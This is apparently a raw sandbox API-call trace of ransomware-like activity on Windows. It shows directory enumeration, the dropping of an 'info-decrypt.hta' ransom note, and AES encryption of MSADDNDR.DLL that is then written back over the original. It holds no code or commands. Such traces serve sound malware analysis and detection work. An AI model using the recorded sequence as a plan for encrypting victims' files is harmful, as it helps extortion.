lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x81afcd40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x81afcd40, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SpeechEngines", cAlternateFileName="SPEECH~1")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf53e90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf53e90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0141.481] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec74 | out: lpFindFileData=0x6d8ec74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0141.481] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0141.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eefc) returned 1 [0141.481] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef08) returned 1 [0141.481] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eeec) returned 1 [0141.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x6d8e9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0141.482] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x6d8e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0141.482] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6d8ec14 | out: lpFindFileData=0x6d8ec14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0141.482] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.482] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0141.482] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0141.483] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0141.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeac) returned 1 [0141.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeb8) returned 1 [0141.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8eeec) returned 1 [0141.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER", nBufferLength=0x105, lpBuffer=0x6d8e9f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER", lpFilePart=0x0) returned 0x26 [0141.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\", nBufferLength=0x105, lpBuffer=0x6d8e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\", lpFilePart=0x0) returned 0x27 [0141.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x6d8ec14 | out: lpFindFileData=0x6d8ec14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f550 [0141.483] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69dc9750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.483] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 1 [0141.483] FindNextFileW (in: hFindFile=0xb7f550, lpFindFileData=0x6d8ec24 | out: lpFindFileData=0x6d8ec24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSADDNDR.DLL", cAlternateFileName="")) returned 0 [0141.484] FindClose (in: hFindFile=0xb7f550 | out: hFindFile=0xb7f550) returned 1 [0141.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeac) returned 1 [0141.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8eeb8) returned 1 [0141.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0141.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e968, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0141.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8edc8) returned 1 [0141.484] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\designer\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6d8ee44 | out: lpFileInformation=0x6d8ee44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8edc4) returned 1 [0141.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e960, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0141.484] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6d8e808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0141.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecfc) returned 1 [0141.484] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\info-decrypt.hta" (normalized: "c:\\program files\\common files\\designer\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4dc [0141.485] GetFileType (hFile=0x4dc) returned 0x1 [0141.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf8) returned 1 [0141.485] GetFileType (hFile=0x4dc) returned 0x1 [0141.485] WriteFile (in: hFile=0x4dc, lpBuffer=0x373d144*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6d8edc0, lpOverlapped=0x0 | out: lpBuffer=0x373d144*, lpNumberOfBytesWritten=0x6d8edc0*=0x1000, lpOverlapped=0x0) returned 1 [0141.485] WriteFile (in: hFile=0x4dc, lpBuffer=0x373d144*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6d8ed94, lpOverlapped=0x0 | out: lpBuffer=0x373d144*, lpNumberOfBytesWritten=0x6d8ed94*=0x55e, lpOverlapped=0x0) returned 1 [0141.485] CloseHandle (hObject=0x4dc) returned 1 [0141.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e968, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0141.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ee14) returned 1 [0141.486] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), fInfoLevelId=0x0, lpFileInformation=0x373e160 | out: lpFileInformation=0x373e160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6accc00, ftCreationTime.dwHighDateTime=0x1ca8d25, ftLastAccessTime.dwLowDateTime=0x69dc9750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc6accc00, ftLastWriteTime.dwHighDateTime=0x1ca8d25, nFileSizeHigh=0x0, nFileSizeLow=0x18340)) returned 1 [0141.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ee10) returned 1 [0141.691] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e854, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0141.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed48) returned 1 [0141.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4dc [0141.691] GetFileType (hFile=0x4dc) returned 0x1 [0141.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed44) returned 1 [0141.691] GetFileType (hFile=0x4dc) returned 0x1 [0141.691] GetFileSize (in: hFile=0x4dc, lpFileSizeHigh=0x6d8ee50 | out: lpFileSizeHigh=0x6d8ee50*=0x0) returned 0x18340 [0141.691] ReadFile (in: hFile=0x4dc, lpBuffer=0x4b9b490, nNumberOfBytesToRead=0x18340, lpNumberOfBytesRead=0x6d8edfc, lpOverlapped=0x0 | out: lpBuffer=0x4b9b490*, lpNumberOfBytesRead=0x6d8edfc*=0x18340, lpOverlapped=0x0) returned 1 [0141.694] CloseHandle (hObject=0x4dc) returned 1 [0141.694] CryptAcquireContextW (in: phProv=0x6d8ed9c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed9c*=0xb1e9d8) returned 1 [0141.695] CryptGenRandom (in: hProv=0xb1e9d8, dwLen=0x10, pbBuffer=0x358c070 | out: pbBuffer=0x358c070) returned 1 [0144.708] CryptImportKey (in: hProv=0xb1e9d8, pbData=0x3745398, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed6c | out: phKey=0x6d8ed6c*=0xb7f590) returned 1 [0144.708] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.708] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.708] CryptDuplicateKey (in: hKey=0xb7f590, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed5c | out: phKey=0x6d8ed5c*=0xb7f210) returned 1 [0144.708] CryptContextAddRef (hProv=0xb1e9d8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0144.708] CryptSetKeyParam (hKey=0xb7f210, dwParam=0x4, pbData=0x3745478*=0x1, dwFlags=0x0) returned 1 [0144.708] CryptSetKeyParam (hKey=0xb7f210, dwParam=0x1, pbData=0x3745444, dwFlags=0x0) returned 1 [0144.709] CryptEncrypt (in: hKey=0xb7f210, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4565ad0*, pdwDataLen=0x6d8edc8*=0x18350, dwBufLen=0x18350 | out: pbData=0x4565ad0*, pdwDataLen=0x6d8edc8*=0x18350) returned 1 [0144.710] CryptEncrypt (in: hKey=0xb7f210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37454a0*, pdwDataLen=0x6d8edd0*=0x0, dwBufLen=0x10 | out: pbData=0x37454a0*, pdwDataLen=0x6d8edd0*=0x10) returned 1 [0144.711] CryptDestroyKey (hKey=0xb7f590) returned 1 [0144.711] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0144.711] CryptReleaseContext (hProv=0xb1e9d8, dwFlags=0x0) returned 1 [0144.712] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", nBufferLength=0x105, lpBuffer=0x6d8e840, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL", lpFilePart=0x0) returned 0x33 [0144.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ed34) returned 1 [0144.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x530 [0144.712] GetFileType (hFile=0x530) returned 0x1 [0144.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ed30) returned 1 [0144.712] GetFileType (hFile=0x530) returned 0x1 [0144.712] WriteFile (in: hFile=0x530, lpBuffer=0x3745b58*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8edc4, lpOverlapped=0x0 | out: lpBuffer=0x3745b58*, lpNumberOfBytesWritten=0x6d8edc4*=0x20, lpOverlapped=0x0) returned 1 [0144.714] CloseHandle (hObject=0x530) returned 1 [0144.714] CoTaskMemAlloc (cb=0x20c) returned 0xbd8860 [0144.714] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbd8860 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0144.714] CoTaskMemFree (pv=0xbd8860) [0144.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e828, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0144.714] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed70 | out: ppv=0x6d8ed70*=0xb51e34) returned 0x0 [0144.714] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed68 | out: pAptType=0x6d8ed68*=1) returned 0x0 [0144.714] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed6c | out: ppvObject=0x6d8ed6c*=0x0) returned 0x80004002 [0144.714] IUnknown:Release (This=0xb51e34) returned 0x1 [0144.715] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e6d8 | out: ppv=0x6d8e6d8*=0x6024910) returned 0x0 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024910, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8f0 | out: ppvObject=0x6d8e8f0*=0x0) returned 0x80004002 [0144.716] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024910, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e904 | out: ppvObject=0x6d8e904*=0x60258b0) returned 0x0 [0144.716] WbemDefPath:IUnknown:Release (This=0x6024910) returned 0x0 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e524 | out: ppvObject=0x6d8e524*=0x60258b0) returned 0x0 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e4e0 | out: ppvObject=0x6d8e4e0*=0x0) returned 0x80004002 [0144.716] WbemDefPath:IUnknown:AddRef (This=0x60258b0) returned 0x3 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8de3c | out: ppvObject=0x6d8de3c*=0x0) returned 0x80004002 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0144.716] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ddf8 | out: ppvObject=0x6d8ddf8*=0xbe25e0) returned 0x0 [0144.716] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe25e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8de00 | out: pCid=0x6d8de00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0144.716] WbemDefPath:IUnknown:Release (This=0xbe25e0) returned 0x3 [0144.716] CoGetContextToken (in: pToken=0x6d8de58 | out: pToken=0x6d8de58) returned 0x0 [0144.717] CoGetContextToken (in: pToken=0x6d8e260 | out: pToken=0x6d8e260) returned 0x0 [0144.717] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2f0 | out: ppvObject=0x6d8e2f0*=0x0) returned 0x80004002 [0144.717] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x2 [0144.717] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x1 [0144.717] CoGetContextToken (in: pToken=0x6d8ebe8 | out: pToken=0x6d8ebe8) returned 0x0 [0144.717] CoGetContextToken (in: pToken=0x6d8eb48 | out: pToken=0x6d8eb48) returned 0x0 [0144.717] WbemDefPath:IUnknown:QueryInterface (in: This=0x60258b0, riid=0x6d8ec18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ec14 | out: ppvObject=0x6d8ec14*=0x60258b0) returned 0x0 [0144.717] WbemDefPath:IUnknown:AddRef (This=0x60258b0) returned 0x3 [0144.717] WbemDefPath:IUnknown:Release (This=0x60258b0) returned 0x2 [0144.717] WbemDefPath:IWbemPath:SetText (This=0x60258b0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.717] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60258b0, puCount=0x6d8ed9c | out: puCount=0x6d8ed9c*=0x0) returned 0x0 [0144.717] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed98*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed98*=0x20, pszText=0x0) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetText (in: This=0x60258b0, lFlags=2, puBuffLength=0x6d8ed98*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed98*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetInfo (in: This=0x60258b0, uRequestedInfo=0x0, puResponse=0x6d8eda4 | out: puResponse=0x6d8eda4*=0xc19) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60258b0, puCount=0x6d8ed9c | out: puCount=0x6d8ed9c*=0x0) returned 0x0 [0144.718] WbemDefPath:IWbemPath:GetInfo (in: This=0x60258b0, uRequestedInfo=0x0, puResponse=0x6d8eda4 | out: puResponse=0x6d8eda4*=0xc19) returned 0x0 [0144.718] 